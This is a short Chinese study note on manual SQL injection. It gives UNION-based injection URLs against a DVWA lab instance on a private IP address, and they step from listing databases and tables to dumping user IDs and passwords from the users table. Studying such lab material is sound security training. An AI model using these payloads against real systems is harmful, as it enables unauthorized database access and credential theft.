手动漏洞挖掘-SQL注入(安全牛笔记)
1 2 | substring_index(USER(), "@" ,l)-- #是将查询出来的结果进行切分,以@符号的方式切分 ’ union select table_name,table_schema from information_schema.tables-- + #查询数据库中所有的库表 |
1 2 3 4 | 查询所有数据库,数据表: http: //192 .168.100.129 /dvwa/vulnerabilities/sqli/ ? id = '+union+select+table_name,table_schema+from+information_schema.tables--+' &Submit=Submit # |
1 2 3 4 | 统计每个数据库中表的数量: http: //192 .168.100.129 /dvwa/vulnerabilities/sqli/ ? id = '+union+select+table_schema,count(*)+from+information_schema.tables group by table_schema--+' &Submit=Submit # |
1 2 3 4 | 查询每个库中对应的表: http: //192 .168.100.129 /dvwa/vulnerabilities/sqli/ ? id = '+union+select+table_name,table_schema from+information_schema.tables where table_schema=' dvwa '--+' &Submit=Submit # |
1 2 3 4 | 查询user表中所有的列: http: //192 .168.100.129 /dvwa/vulnerabilities/sqli/ ? id = '+union+select+table_name,column_name from+information_schema.columns where table_schema=' dvwa ' and table_name=' users '--+' &Submit=Submit # |
1 2 3 4 | 查询user表中的用户和密码: http: //192 .168.100.129 /dvwa/vulnerabilities/sqli/ ? id = '+union+select+user_id,password from dvwa.users --+' &Submit=Submit # |
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】博客园社区专享云产品让利特惠,阿里云新客6.5折上折
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步